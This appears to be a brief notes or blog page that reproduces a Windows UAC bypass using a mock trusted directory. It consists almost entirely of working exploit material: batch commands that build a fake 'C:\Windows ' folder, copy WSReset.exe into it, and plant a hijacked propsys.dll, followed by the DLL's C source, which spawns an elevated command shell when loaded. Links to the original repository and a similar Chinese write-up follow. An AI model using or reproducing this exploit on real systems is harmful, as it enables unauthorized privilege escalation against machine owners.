enter description here

enter description here

https://github.com/sailay1996/UAC_bypass_windows_store

1
2
3
4
5
mkdir "\\?\C:\Windows "
mkdir "\\?\C:\Windows \System32"
copy "C:\Windows\System32\WSReset.exe" "C:\Windows \System32\"
copy "propsys.dll" "C:\Windows \System32\"
"C:\Windows \System32\WSReset.exe"
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
#include <windows.h> 
#include <Winuser.h> 
 
// x86-w64-mingw32-gcc -shared -o propsys.dll propsys.c -lcomctl32 -Wl,--subsystem,windows  

//  @404death

int sailayv(){
    MessageBox(0, "Spawnning shell as Administrator", "pwned!!!", MB_OK);
    WinExec("cmd.exe /k C:\\windows\\system32\\cmd.exe", 0);
//    ExitProcess(0);
    return 0;
}

BOOL WINAPI DllMain (HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved)  
{  
  if (fdwReason == DLL_PROCESS_ATTACH)  
  {  
    sailayv();  
  }  
  
  return TRUE;  
}

https://github.com/sailay1996/UAC_bypass_windows_store

类似参考例子 通过模拟可信目录绕过UAC :https://3gstudent.github.io/3gstudent.github.io/%E9%80%9A%E8%BF%87%E6%A8%A1%E6%8B%9F%E5%8F%AF%E4%BF%A1%E7%9B%AE%E5%BD%95%E7%BB%95%E8%BF%87UAC%E7%9A%84%E5%88%A9%E7%94%A8%E5%88%86%E6%9E%90/